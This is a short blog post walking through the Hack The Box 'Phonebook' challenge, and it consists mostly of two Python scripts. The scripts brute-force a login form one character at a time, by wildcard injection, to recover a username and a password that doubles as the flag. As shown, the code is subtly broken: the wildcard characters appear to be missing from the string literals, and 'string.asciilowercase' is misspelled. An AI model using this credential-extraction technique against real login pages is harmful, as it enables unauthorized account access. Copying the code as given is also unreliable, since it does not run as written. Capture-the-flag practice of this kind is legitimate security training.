emacab98

Phonebook - HTB - Challenges

October 25, 2022224 words

To exploit the wildcard SQL injection, this script helps us to identify the username:

import requests
import string
alphabet = string.digits + string.asciilowercase + string.asciiuppercase + string.punctuation
word = ''
while(True):
    for letter in alphabet:
        x = requests.post('http://165.22.122.58:31348/login', data = {'username': word + letter + '', 'password': ''})
        if x.url == 'http://165.22.122.58:31348/':
            word = word + letter
            print(word)
With a slight modification, we can also identify the user's password:
import requests
import string
alphabet = string.digits + string.asciilowercase + string.asciiuppercase + string.punctuation
word = ''
while(True):
    for letter in alphabet:
        if letter == '':
            continue
        print(f"Trying with {word} and {letter}")
        x = requests.post('http://165.22.122.58:31348/login', data = {'username': 'rEesE', 'password': word + letter + ''})
        if x.url == 'http://165.22.122.58:31348/':
            word = word + letter
            print(word)
which is also the flag that solves the challenge.
Merry hacking ;)

React to this post
👍❤️🫶👏👌🤯🤔😂😍😭😢😡😮

You'll only receive email when they publish something new.

More from emacab98
All posts